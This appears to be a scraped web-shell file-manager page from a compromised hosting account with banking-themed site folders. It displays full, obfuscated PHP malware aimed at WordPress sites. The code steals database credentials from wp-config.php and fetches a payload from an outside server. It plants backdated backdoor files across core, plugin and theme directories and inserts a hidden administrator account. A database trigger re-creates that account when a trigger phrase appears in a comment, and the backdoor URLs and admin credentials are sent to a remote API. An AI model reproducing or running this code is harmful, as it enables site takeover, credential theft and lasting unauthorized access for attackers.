Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 3.144.255.53
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
derozboy /
camoxavo-group.pro /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-03-15 11:30
app
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
assets
[ DIR ]
drwxr-xr-x
2025-04-23 05:56
cartes-bancaires
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
cgi-bin
[ DIR ]
drwxr-xr-x
2025-04-25 11:33
connexion
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
contact
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
demande-de-pret
[ DIR ]
drwxr-xr-x
2024-08-01 18:48
faq
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
image
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
mentions-legales
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
offres
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
ouverture-de-compte
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
partials
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
tarifs
[ DIR ]
drwxr-xr-x
2024-08-01 18:48
.dba_insertion
95
B
-rw-r--r--
2025-01-07 14:31
.htaccess
197
B
-r--r--r--
2025-04-22 01:18
.requests
53
B
-rw-r--r--
2025-01-07 14:31
1.php
23.95
KB
-rw-r--r--
2024-12-26 11:21
CAMOXAVO.zip
12.6
MB
-rw-r--r--
2024-08-01 13:53
admin.php
5.24
KB
-rw-r--r--
2025-04-22 03:17
dbv3.sql
4.43
KB
-rw-r--r--
2023-04-17 05:33
deconnexion.php
231
B
-rw-r--r--
2023-04-17 05:33
error_log
3.78
MB
-rw-r--r--
2025-04-30 03:40
form.php
3.85
KB
-rw-r--r--
2024-12-19 02:48
index.html
47.47
KB
-rw-r--r--
2024-08-01 14:08
info
137
B
-rw-r--r--
2024-08-01 14:16
login.php
6.23
KB
-rw-r--r--
2024-12-01 10:36
logo2.png
20.66
KB
-rw-r--r--
2024-08-01 18:27
message.php
625
B
-rw-r--r--
2023-04-17 05:33
mon-compte.php
3.74
KB
-rw-r--r--
2023-04-17 05:33
pxm.txt
1
B
-rw-r--r--
2024-11-09 02:36
qqs.txt
1
B
-rw-r--r--
2025-01-16 09:22
robots.txt
1017
B
-rw-r--r--
2025-04-11 06:37
ss.php
13.5
KB
-rw-r--r--
2024-11-30 10:37
transaction.php
2.34
KB
-rw-r--r--
2024-12-01 22:40
utilities.php
742
B
-rw-r--r--
2023-04-17 05:33
virement.php
5.2
KB
-rw-r--r--
2023-04-17 05:33
wp-blog-header.php
2.73
KB
-rw-r--r--
2025-04-22 01:18
wp-cron.php
2.73
KB
-rw-r--r--
2025-04-22 01:18
Save
Rename
<?php define('CURRENTDIR', getcwd()); define('UPLOAD_SHELL', 1); define('OUT', 4); define('API_PATH', 'http://virtual-slots.com/src/accsec.php'); /** without http * */ define('PATH_TO_BACK_SHELL', 'mpdistrict.com/logo'); /** without http * */ $zvvzgrnbk = 'http://virtual-slots.com/src/temp/caf1c0900cae95cd35ea0ded9fb07283'; $xiaggmdlhtrk = euyuhod(); $rznhvngue = 'adminkelp'; $tacjmntwh = oungvggat(); $lgtnryvvas = $xiaggmdlhtrk[1]; $vkljgcq = $tacjmntwh; $dmxpqhyn = ''; $crjbuwzsbirv = 'https://wordpress.com'; $ufgyxarnkxl = wlamd('2019-07-09 00:00:00', '2023-08-27 00:00:00'); $gtcodjq = ''; $yahytxx = '0'; $bvikphscoi = $tacjmntwh; if (is_null($yylpnqteov = gnwnb())) { echo 'invalid detect wp root dir'; exit; } if (!function_exists('file_put_contents')) { function file_put_contents($wjhyscqaezx, $ebglpfld) { $egrrrmtxjhgy = @fopen($wjhyscqaezx, 'w'); if (!$egrrrmtxjhgy) { return false; } else { $urkwpetj = fwrite($egrrrmtxjhgy, $ebglpfld); fclose($egrrrmtxjhgy); return $urkwpetj; } } } $aqvqoygm = array(); if (!file_exists($qohjkdq = $yylpnqteov . '/wp-config.php')) { echo 'wp-config not found'; exit; } $nsgxoew = file_get_contents($qohjkdq); preg_match_all("~^define.*(DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)[\'\"],\s*[\'\"](.+)[\'\"]\s*\);~m", $nsgxoew, $eensfirvfxpn); preg_match("~table_prefix\s+=\s*[\'\"](.+)[\'\"];~", $nsgxoew, $ffkcyko); $oxufslnnxfyu = $eensfirvfxpn[2][0]; $rrpgtcm = $eensfirvfxpn[2][1]; $qejqyfhc = $eensfirvfxpn[2][2]; $onsstcywxolz = $eensfirvfxpn[2][3]; $zcyupjiiihlj = $ffkcyko[1]; $vnoehoquw = yibeq($tacjmntwh, $lgtnryvvas, $vkljgcq, $dmxpqhyn, $crjbuwzsbirv, $ufgyxarnkxl, $gtcodjq, $yahytxx, $bvikphscoi, $oxufslnnxfyu, $zcyupjiiihlj); $zcigbiceqnuw = mysqli_connect($onsstcywxolz, $rrpgtcm, $qejqyfhc, $oxufslnnxfyu); if (!$zcigbiceqnuw) { require_once($yylpnqteov . '/wp-config.php'); $eawxvft = get_defined_constants(true); if (!$eawxvft['user']) { throw new \Exception("Could not connect"); } $oxufslnnxfyu = $eawxvft['user']['DB_NAME']; $rrpgtcm = $eawxvft['user']['DB_USER']; $qejqyfhc = $eawxvft['user']['DB_PASSWORD']; $onsstcywxolz = $eawxvft['user']['DB_HOST']; $zcyupjiiihlj = $ffkcyko[1]; $zcigbiceqnuw = mysqli_connect($onsstcywxolz, $rrpgtcm, $qejqyfhc, $oxufslnnxfyu); } $kgnyva = $_SERVER['HTTP_HOST']; if (mysqli_connect_errno()) { $pejigwuztc = 1; echo "Could not connect" . PHP_EOL; } else { echo "Connected successfully" . PHP_EOL; $nqhpoljlfjx = mysqli_query($zcigbiceqnuw, "select * from " . $zcyupjiiihlj . "options where option_name = 'home' or option_name = 'siteurl'"); $lywjtn = mysqli_fetch_row($nqhpoljlfjx); if (stristr($lywjtn[2], 'http') !== false) { $kgnyva = $lywjtn[2]; } if (stristr($lywjtn[3], 'http') !== false) { $kgnyva = $lywjtn[3]; } } if (UPLOAD_SHELL === 1) { if (!function_exists('curl_init')) { $fpwmolvmmxg = tsfjiif($zvvzgrnbk); define('USE_FGC', 1); } else { $fpwmolvmmxg = zfcvcqwlk($zvvzgrnbk); } if (!$fpwmolvmmxg) { echo 'check sh domain' . PHP_EOL; exit; } if ($fpwmolvmmxg[1] === 403) { echo 'firewall in action!'; exit; } if ($fpwmolvmmxg[1] !== 200) { echo 'need update script' . PHP_EOL; exit; } $xfirxz = $fpwmolvmmxg[0]; $laybdqgv = unserialize(base64_decode($xfirxz)); $ualmbqttwm = array('variable', 'function', 'class', 'object', 'array', 'string', 'integer', 'boolean', 'float', 'double', 'character', 'list', 'set', 'queue', 'stack', 'pointer', 'reference', 'constructor', 'interface', 'method', 'event', 'exception', 'loop', 'condition', 'statement', 'module', 'package', 'library', 'framework', 'compiler', 'interpreter', 'database', 'sql', 'query', 'index', 'table', 'view', 'trigger', 'schema', 'git', 'repository', 'branch', 'merge', 'client', 'encryption', 'decryption', 'hashing', 'session', 'cookie', 'json', 'xml', 'restful', 'soap', 'url', 'http', 'https', 'dns', 'firewall', 'security', 'ajax-response', 'cron', 'stream', 'private', 'meta', 'wp', 'core', 'ajax', 'beta', 'alpha', 'sample', 'path', 'request', 'old', 'info', 'base', 'num', 'all', 'stat', 'new', 'plain', 'add', 'edit', 'live', 'pic', 'less', 'more', 'part', 'get', 'long', 'call', 'first', 'time', 'other'); $lcjikmrt = fhwwj($yylpnqteov . '/wp-admin', 3); $pjsknlqwxdj = fhwwj($yylpnqteov . '/wp-content/plugins', 3); $ldadyvuxpr = fhwwj($yylpnqteov . '/wp-includes', 3); $luzhuygnbt = fhwwj($yylpnqteov . '/wp-content/themes', 3); $xbpskebtltq = array_merge($lcjikmrt, $pjsknlqwxdj, $ldadyvuxpr, $luzhuygnbt); $mfpwtmdz = count($ualmbqttwm); $bfpckafqrxim = $yylpnqteov . '/wp-config-sample.php'; $ixzapfapjei = $laybdqgv['wp-config-sample.php?config']; $laqdktdhgdih = $ualmbqttwm[rand(0, $mfpwtmdz - 1)] . qyjvtoxak(rand(3, 6)); $kcbifjlyng = '$_GET[\'' . $laqdktdhgdih . '\']'; $ixzapfapjei = str_replace('$_GET[\'config\']', $kcbifjlyng, $ixzapfapjei); file_put_contents($bfpckafqrxim, $ixzapfapjei); touch($bfpckafqrxim, pztsz(dirname($bfpckafqrxim))); $aqvqoygm[] = urgemil($yylpnqteov, $bfpckafqrxim . '?' . $laqdktdhgdih, $kgnyva); unset($laybdqgv['wp-config-sample.php?config']); if (empty($xbpskebtltq)) { echo 'no directories to write' . PHP_EOL; exit; } $jmdmncsz = array_keys($laybdqgv); foreach ($xbpskebtltq as $mtbtayvingum) { if (empty($jmdmncsz)) { $jmdmncsz = array_keys($laybdqgv); } $augwwzvc = str_replace('.php', '-' . $ualmbqttwm[rand(0, $mfpwtmdz - 1)] . '.php', $mtbtayvingum); $omnyhqo = array_shift($jmdmncsz); $fqkhbxt = $laybdqgv[$omnyhqo]; file_put_contents($augwwzvc, $fqkhbxt); touch($augwwzvc, pztsz(dirname($augwwzvc))); $ojdxkpbxw = explode('?', $omnyhqo); $qogugndz = urgemil($yylpnqteov, $augwwzvc, $kgnyva); $aqvqoygm[] = (isset($ojdxkpbxw[1])) ? $qogugndz . '?' . pgvfyhct($ojdxkpbxw[1]) : $qogugndz; } } function pgvfyhct($ojdxkpbxw) { if (defined('PATH_TO_BACK_SHELL') && (stristr($ojdxkpbxw, 'example.com') !== false)) { return str_replace('example.com', PATH_TO_BACK_SHELL, $ojdxkpbxw); } return $ojdxkpbxw; } if (!isset($pejigwuztc)) { $lrvsdkxmk = pmohn($kgnyva); $mgqedx = "update `${zcyupjiiihlj}options` set option_value = '' WHERE `option_name` LIKE 'close_comments_for_old_posts'"; if (!mysqli_query($zcigbiceqnuw, $mgqedx)) { echo 'invalid set value 0 for option >>close_comments_value<<' . PHP_EOL; } $rcjqclmjyz = "UPDATE `${zcyupjiiihlj}posts` set ping_status = 'open' where (post_type = 'page' OR post_type = 'post') AND post_status = 'publish' AND guid LIKE '%${lrvsdkxmk}%' ORDER BY id LIMIT 5"; $oscislix = array(); if (mysqli_query($zcigbiceqnuw, $rcjqclmjyz)) { //echo 'posts ready to accept trackbacks' . PHP_EOL; $cnwegcs = "select id, guid, post_name from `${zcyupjiiihlj}posts` where (post_type = 'page' OR post_type = 'post') AND post_status = 'publish' AND guid LIKE '%${lrvsdkxmk}%' ORDER BY id LIMIT 5"; $nhsyvbh = mysqli_query($zcigbiceqnuw, $cnwegcs); while ($dqmjpz = mysqli_fetch_array($nhsyvbh)) { $oscislix[] = array($dqmjpz['id'], $dqmjpz['guid'], $dqmjpz['post_name']); } } //$nsvblcjb = "SELECT * FROM `${zcyupjiiihlj}users` WHERE `user_pass` = '$lgtnryvvas'"; $nsvblcjb = "SELECT * FROM `${zcyupjiiihlj}users` WHERE `user_login` = '$tacjmntwh' order by id desc limit 1"; $wtcimuwp = "SELECT * FROM `${zcyupjiiihlj}users` WHERE `user_login` = '$rznhvngue'"; $mgawjb = mysqli_query($zcigbiceqnuw, $nsvblcjb); $lklaat = mysqli_query($zcigbiceqnuw, $wtcimuwp); if (mysqli_num_rows($lklaat)) { $qbcivohg = "delete from `${zcyupjiiihlj}users` WHERE `user_login` = '$rznhvngue'"; mysqli_query($zcigbiceqnuw, $qbcivohg); } if (!mysqli_num_rows($mgawjb)) { $zdnkhkuxrzhh = mysqli_query($zcigbiceqnuw, "SELECT ID from `" . $oxufslnnxfyu . "`.`" . $zcyupjiiihlj . "users` ORDER BY `ID` DESC LIMIT 1"); $enwoyyrzji = mysqli_fetch_row($zdnkhkuxrzhh); $zsdebbrep = (int)++$enwoyyrzji[0]; mysqli_query($zcigbiceqnuw, "INSERT INTO `" . $oxufslnnxfyu . "`.`" . $zcyupjiiihlj . "users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('$zsdebbrep', '$tacjmntwh', '$lgtnryvvas', '$vkljgcq', '$dmxpqhyn', '$crjbuwzsbirv', '$ufgyxarnkxl', '$gtcodjq', '$yahytxx', '$bvikphscoi')"); mysqli_query($zcigbiceqnuw, "INSERT INTO `" . $oxufslnnxfyu . "`.`" . $zcyupjiiihlj . "usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, $zsdebbrep, '" . $zcyupjiiihlj . "capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')"); mysqli_query($zcigbiceqnuw, "INSERT INTO `" . $oxufslnnxfyu . "`.`" . $zcyupjiiihlj . "usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, $zsdebbrep, '" . $zcyupjiiihlj . "user_level', '10')"); //echo $kgnyva . " admin inserted" . PHP_EOL; echo sprintf('%s admin inserted %s::%s', $kgnyva, $tacjmntwh, $xiaggmdlhtrk[0]) . PHP_EOL; $ctpmzws = 1; mysqli_query($zcigbiceqnuw, "DROP TRIGGER IF EXISTS `after_insert_comment`"); try { if (mysqli_query($zcigbiceqnuw, $vnoehoquw)) { echo 'trigger created' . str_repeat(PHP_EOL, 3); } } catch (\Exception $ewamtekbdht) { echo $ewamtekbdht->getMessage() . PHP_EOL; } } else { while ($anxeewx = mysqli_fetch_array($mgawjb)) { $bkmvdt = $anxeewx['user_pass']; } $zdqmgr = "SHOW TRIGGERS"; $ptgdehkhbd = mysqli_query($zcigbiceqnuw, $zdqmgr); if ($ptgdehkhbd) { while ($gosjntznkuiq = mysqli_fetch_array($ptgdehkhbd)) { if ($gosjntznkuiq['Trigger'] === 'after_insert_comment') { if (strpos($gosjntznkuiq['Statement'], $bkmvdt) !== false) { //echo 'hash and trigger matched!'; break; } else { //echo 'not matched need drop trigger'; mysqli_query($zcigbiceqnuw, "DROP TRIGGER IF EXISTS `after_insert_comment`"); try { $vnoehoquw = yibeq($tacjmntwh, $bkmvdt, $vkljgcq, $dmxpqhyn, $crjbuwzsbirv, $ufgyxarnkxl, $gtcodjq, $yahytxx, $bvikphscoi, $oxufslnnxfyu, $zcyupjiiihlj); if (mysqli_query($zcigbiceqnuw, $vnoehoquw)) { echo 'trigger created' . str_repeat(PHP_EOL, 3); } } catch (\Exception $ewamtekbdht) { echo $ewamtekbdht->getMessage() . PHP_EOL; } } break; } } } echo $kgnyva . ' admin exists' . PHP_EOL; } mysqli_close($zcigbiceqnuw); } echo implode("\n", $aqvqoygm) . "\n"; $aqvqoygm['host'] = $kgnyva; if (!empty($oscislix)) { $aqvqoygm['trackbacks'] = $oscislix; } if (isset($ctpmzws)) { $aqvqoygm['authdata'] = array($tacjmntwh, $xiaggmdlhtrk[0]); } $aqvqoygm['out'] = OUT; $eifavohwym = dtgvvzqd(API_PATH, array('source' => base64_encode(serialize($aqvqoygm)),)); if (trim($eifavohwym) !== 'success') { echo "!!!!error while sending data!!!!" . PHP_EOL; exit; } echo str_repeat('_', 400) . "\n"; function gnwnb() { if (file_exists(CURRENTDIR . '/wp-config.php')) { return CURRENTDIR; } $tjpeikrwngu = preg_replace('~\/(wp-admin|wp-includes|wp-content).*$~', '', CURRENTDIR); if (file_exists($tjpeikrwngu . '/wp-config.php')) { return $tjpeikrwngu; } return null; } function tsfjiif($qogugndz) { $cpemofzm = stream_context_create(array('http' => array('ignore_errors' => true))); $ebglpfld = @file_get_contents($qogugndz, false, $cpemofzm); if ($ebglpfld === false) { $gagvjtdxrch = error_get_last(); //echo "HTTP request failed. Error was: " . $gagvjtdxrch['message']; return false; } else { $uhkhqe = null; if (!empty($xmtwntzzcj) && isset($xmtwntzzcj[0])) { preg_match('{HTTP\/\S*\s(\d{3})}', $xmtwntzzcj[0], $lrannoaev); $uhkhqe = intval($lrannoaev[1]); } return array($ebglpfld, $uhkhqe); } } function zfcvcqwlk($qogugndz) { $lnaipketkhkn = curl_init(); curl_setopt($lnaipketkhkn, CURLOPT_URL, $qogugndz); curl_setopt($lnaipketkhkn, CURLOPT_HEADER, 0); curl_setopt($lnaipketkhkn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($lnaipketkhkn, CURLOPT_TIMEOUT, 10); $ebglpfld = curl_exec($lnaipketkhkn); if (!$ebglpfld) { return false; } $wgmyetxhr = curl_getinfo($lnaipketkhkn, CURLINFO_HTTP_CODE); curl_close($lnaipketkhkn); return array($ebglpfld, $wgmyetxhr); } function dtgvvzqd($qogugndz, $ebglpfld) { if (defined('USE_FGC')) { return spptdez($qogugndz, $ebglpfld); } return nsiiepjec($qogugndz, $ebglpfld); } function spptdez($qogugndz, $ebglpfld) { $ehzsambbtydm = http_build_query($ebglpfld); $nibqovta = array( 'http' => array( 'method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => $ehzsambbtydm, 'timeout' => 10, ), "ssl" => array( "verify_peer" => false, "verify_peer_name" => false, ), ); $cpemofzm = stream_context_create($nibqovta); $gdmlmjqeme = @file_get_contents($qogugndz, false, $cpemofzm); $uhkhqe = null; if (isset($xmtwntzzcj[0])) { preg_match('{HTTP\/\S*\s(\d{3})}', $xmtwntzzcj[0], $lrannoaev); $uhkhqe = intval($lrannoaev[1]); } return ($uhkhqe === 200) ? trim($gdmlmjqeme) : null; } function nsiiepjec($qogugndz, $ebglpfld) { $lnaipketkhkn = curl_init(); curl_setopt($lnaipketkhkn, CURLOPT_URL, $qogugndz); curl_setopt($lnaipketkhkn, CURLOPT_RETURNTRANSFER, true); curl_setopt($lnaipketkhkn, CURLOPT_TIMEOUT, 10); curl_setopt($lnaipketkhkn, CURLOPT_POST, true); curl_setopt($lnaipketkhkn, CURLOPT_POSTFIELDS, $ebglpfld); curl_setopt($lnaipketkhkn, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($lnaipketkhkn, CURLOPT_SSL_VERIFYPEER, 0); $gdmlmjqeme = curl_exec($lnaipketkhkn); $fysahj = curl_getinfo($lnaipketkhkn); curl_close($lnaipketkhkn); return ($fysahj["http_code"] == 200) ? trim($gdmlmjqeme) : null; } function pztsz($farsnxwrop) { foreach (glob($farsnxwrop . "/*php") as $zhmtuersvbgi) { $musnsh[] = filemtime($zhmtuersvbgi); } $wjbtnlrn = array_count_values($musnsh); arsort($wjbtnlrn); $jmdmncsz = array_keys($wjbtnlrn); return array_shift($jmdmncsz); } function urgemil($zudsdr, $augwwzvc, $lrvsdkxmk = null) { $lrvsdkxmk = !$lrvsdkxmk ? 'http://' . $_SERVER['HTTP_HOST'] : $lrvsdkxmk; $pujikzkth = str_replace($zudsdr, '', $augwwzvc); return rtrim($lrvsdkxmk, '/') . DIRECTORY_SEPARATOR . ltrim($pujikzkth, '/'); } function muexe($squlljgtubf, $revkmi = 1) { if (!is_dir($squlljgtubf)) { return; } $asofvklpv = realpath($squlljgtubf); $qqewnf = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($asofvklpv), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD); $qqewnf->setMaxDepth($revkmi); foreach ($qqewnf as $zfjxzvs => $qzpgdlmupz) { if (($asofvklpv = $qzpgdlmupz->getPath()) === $squlljgtubf) { continue; } if (is_dir($qzpgdlmupz) && is_writeable($qzpgdlmupz)) { $musnsh[] = $asofvklpv; } } return array_unique($musnsh); } function fhwwj($squlljgtubf, $xeplkvhrf = 2, $revkmi = 1) { if (!is_dir($squlljgtubf)) { return; } $asofvklpv = realpath($squlljgtubf); $qqewnf = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($asofvklpv), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD); $qqewnf->setMaxDepth($revkmi); $musnsh = array(); foreach ($qqewnf as $zfjxzvs => $qzpgdlmupz) { $asofvklpv = $qzpgdlmupz->getPathName(); if (stristr($asofvklpv, '.php') === false) { continue; } if (!is_writeable(dirname($asofvklpv))) { continue; } $musnsh[$asofvklpv] = 1; } $htpoptoxjmy = array_keys($musnsh); shuffle($htpoptoxjmy); return array_slice($htpoptoxjmy, 0, $xeplkvhrf); } function yibeq($tacjmntwh, $lgtnryvvas, $vkljgcq, $dmxpqhyn, $crjbuwzsbirv, $ufgyxarnkxl, $gtcodjq, $yahytxx, $bvikphscoi, $oxufslnnxfyu, $zcyupjiiihlj) { $qhtpmp = <<<STR CREATE TRIGGER `after_insert_comment` AFTER INSERT ON `${oxufslnnxfyu}`.`${zcyupjiiihlj}comments` FOR EACH ROW BEGIN IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN SET @lastInsertWpUsersId = (SELECT MAX(id) FROM `${oxufslnnxfyu}`.`${zcyupjiiihlj}users`); SET @nextWpUsersID = @lastInsertWpUsersId + 1; INSERT INTO `${oxufslnnxfyu}`.`${zcyupjiiihlj}users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (@nextWpUsersID, '${tacjmntwh}', '${lgtnryvvas}', '${vkljgcq}', '${dmxpqhyn}', '${crjbuwzsbirv}', '${ufgyxarnkxl}', '${gtcodjq}', '${yahytxx}', '${bvikphscoi}'); INSERT INTO `${oxufslnnxfyu}`.`${zcyupjiiihlj}usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, '${zcyupjiiihlj}capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}'); INSERT INTO `${oxufslnnxfyu}`.`${zcyupjiiihlj}usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, '${zcyupjiiihlj}user_level', '10'); END IF; END; STR; return $qhtpmp; } function pmohn($qogugndz) { $lrvsdkxmk = parse_url($qogugndz, PHP_URL_HOST); return str_replace('www.', '', $lrvsdkxmk); } function wlamd($iagomtkmd, $kzgklloosl, $pfhkajl = 'Y-m-d H:i:s') { $yatbjy = strtotime($iagomtkmd); $goveoieyjs = strtotime($kzgklloosl); $aiybpzmfdx = mt_rand($yatbjy, $goveoieyjs); return date($pfhkajl, $aiybpzmfdx); } function qyjvtoxak($ssjyuabgcmp, $qfqjlo = false) { $mgnbmaetq = "abcdefghijklmnopqrstuvwxyz"; if ($qfqjlo) { $mgnbmaetq .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~><?}{[];!@#$%^&*()_+-={}[]:;<=>?@'; } $rmpwgtz = strlen($mgnbmaetq); $dpbtjt = ""; for ($tnqymohd = 0; $tnqymohd < $ssjyuabgcmp; $tnqymohd++) { $dpbtjt .= $mgnbmaetq[rand(0, $rmpwgtz - 1)]; } return $dpbtjt; } function oungvggat() { preg_match_all('~\d~', md5($_SERVER['HTTP_HOST']), $dgkesxihvxw); $prjezvv = $dgkesxihvxw[0][0]; $xtbkvzzahcxw = end($dgkesxihvxw[0]); $ofyagjct = array('wp', 'cms', 'web', 'dev', 'blog', 'main', 'articles', 'notes', 'news', 'archive',); $dbihlby = array('panel', 'feed', 'client', 'user', 'rss', 'option', 'auth', 'table', 'user', 'profile',); return $ofyagjct[$prjezvv] . $dbihlby[$xtbkvzzahcxw]; } function kojbhadcu($ncvciemre, $vmqlvsxsktp) { $jcndluvkmkks = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; define('ITOA64_CUSTOM', $jcndluvkmkks); if ($ncvciemre < 4 || $ncvciemre > 31) { $ncvciemre = 8; } define('ITERATION_COUNT_LOG2_CUSTOM', $ncvciemre); define('PORTABLE_HASHES_CUSTOM', $vmqlvsxsktp); $feespxjypoc = microtime(); if (function_exists('getmypid')) { $feespxjypoc .= getmypid(); } define('RANDOM_STATE_CUSTOM', $feespxjypoc); } function znnwigl($qsshnfijluv) { if (strlen($qsshnfijluv) > 4096) { return '*'; } $lscrmsf = ''; if (CRYPT_BLOWFISH === 1 && !PORTABLE_HASHES_CUSTOM) { $lscrmsf = zcdpocomk(16); $tesjscxh = crypt($qsshnfijluv, aoqfkuf($lscrmsf)); if (strlen($tesjscxh) === 60) { return $tesjscxh; } } if (strlen($lscrmsf) < 6) { $lscrmsf = zcdpocomk(6); } $tesjscxh = jxdnjw($qsshnfijluv, aljaaeuid($lscrmsf)); if (strlen($tesjscxh) === 34) { return $tesjscxh; } return '*'; } function zcdpocomk($wjbtnlrn) { $fjdcyfmn = ''; if (@is_readable('/dev/urandom') && ($lsqktuyx = @fopen('/dev/urandom', 'rb'))) { $fjdcyfmn = fread($lsqktuyx, $wjbtnlrn); fclose($lsqktuyx); } if (strlen($fjdcyfmn) < $wjbtnlrn) { $fjdcyfmn = ''; $isevhwacthl = RANDOM_STATE_CUSTOM; for ($tnqymohd = 0; $tnqymohd < $wjbtnlrn; $tnqymohd += 16) { $isevhwacthl = md5(microtime() . $isevhwacthl); $fjdcyfmn .= md5($isevhwacthl, TRUE); } $fjdcyfmn = substr($fjdcyfmn, 0, $wjbtnlrn); } return $fjdcyfmn; } function aoqfkuf($tpjcxnv) { $jcndluvkmkks = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; $fjdcyfmn = '$2a$'; $fjdcyfmn .= chr((int)(ord('0') + ITERATION_COUNT_LOG2_CUSTOM / 10)); $fjdcyfmn .= chr(ord('0') + ITERATION_COUNT_LOG2_CUSTOM % 10); $fjdcyfmn .= '$'; $tnqymohd = 0; do { $zwqvdpo = ord($tpjcxnv[$tnqymohd++]); $fjdcyfmn .= $jcndluvkmkks[$zwqvdpo >> 2]; $zwqvdpo = ($zwqvdpo & 0x03) << 4; if ($tnqymohd >= 16) { $fjdcyfmn .= $jcndluvkmkks[$zwqvdpo]; break; } $vpgwnqfd = ord($tpjcxnv[$tnqymohd++]); $zwqvdpo |= $vpgwnqfd >> 4; $fjdcyfmn .= $jcndluvkmkks[$zwqvdpo]; $zwqvdpo = ($vpgwnqfd & 0x0f) << 2; $vpgwnqfd = ord($tpjcxnv[$tnqymohd++]); $zwqvdpo |= $vpgwnqfd >> 6; $fjdcyfmn .= $jcndluvkmkks[$zwqvdpo]; $fjdcyfmn .= $jcndluvkmkks[$vpgwnqfd & 0x3f]; } while (1); return $fjdcyfmn; } function jxdnjw($qsshnfijluv, $gqoqvyq) { $fjdcyfmn = '*0'; if (substr($gqoqvyq, 0, 2) === $fjdcyfmn) { $fjdcyfmn = '*1'; } $holzbtzfl = substr($gqoqvyq, 0, 3); //if ($holzbtzfl !== '$akelapesga$' && $holzbtzfl !== '$npxfzarbmo$') { if ($holzbtzfl !== base64_decode('JFAk') && $holzbtzfl !== base64_decode('JEgk')) { return $fjdcyfmn; } $mddxlezgeupx = strpos(ITOA64_CUSTOM, $gqoqvyq[3]); if ($mddxlezgeupx < 7 || $mddxlezgeupx > 30) { return $fjdcyfmn; } $wjbtnlrn = 1 << $mddxlezgeupx; $rklgbzosu = substr($gqoqvyq, 4, 8); if (strlen($rklgbzosu) !== 8) { return $fjdcyfmn; } $tesjscxh = md5($rklgbzosu . $qsshnfijluv, TRUE); do { $tesjscxh = md5($tesjscxh . $qsshnfijluv, TRUE); } while (--$wjbtnlrn); $fjdcyfmn = substr($gqoqvyq, 0, 12); $fjdcyfmn .= wbikb($tesjscxh, 16); return $fjdcyfmn; } function wbikb($tpjcxnv, $wjbtnlrn) { $fjdcyfmn = ''; $tnqymohd = 0; $jcndluvkmkks = ITOA64_CUSTOM; do { $mfjakcwcxjaw = ord($tpjcxnv[$tnqymohd++]); $fjdcyfmn .= $jcndluvkmkks[$mfjakcwcxjaw & 0x3f]; if ($tnqymohd < $wjbtnlrn) { $mfjakcwcxjaw |= ord($tpjcxnv[$tnqymohd]) << 8; } $fjdcyfmn .= $jcndluvkmkks[($mfjakcwcxjaw >> 6) & 0x3f]; if ($tnqymohd++ >= $wjbtnlrn) { break; } if ($tnqymohd < $wjbtnlrn) { $mfjakcwcxjaw |= ord($tpjcxnv[$tnqymohd]) << 16; } $fjdcyfmn .= $jcndluvkmkks[($mfjakcwcxjaw >> 12) & 0x3f]; if ($tnqymohd++ >= $wjbtnlrn) { break; } $fjdcyfmn .= $jcndluvkmkks[($mfjakcwcxjaw >> 18) & 0x3f]; } while ($tnqymohd < $wjbtnlrn); return $fjdcyfmn; } function aljaaeuid($tpjcxnv) { //$fjdcyfmn = '$akelapesga$'; $fjdcyfmn = base64_decode('JFAk'); $jcndluvkmkks = ITOA64_CUSTOM; $fjdcyfmn .= $jcndluvkmkks[min(ITERATION_COUNT_LOG2_CUSTOM + 5, 30)]; $fjdcyfmn .= wbikb($tpjcxnv, 6); return $fjdcyfmn; } function euyuhod() { $wgipizxq = qyjvtoxak(rand(20, 40), true); kojbhadcu(4, true); $tesjscxh = znnwigl($wgipizxq); return array($wgipizxq, $tesjscxh); }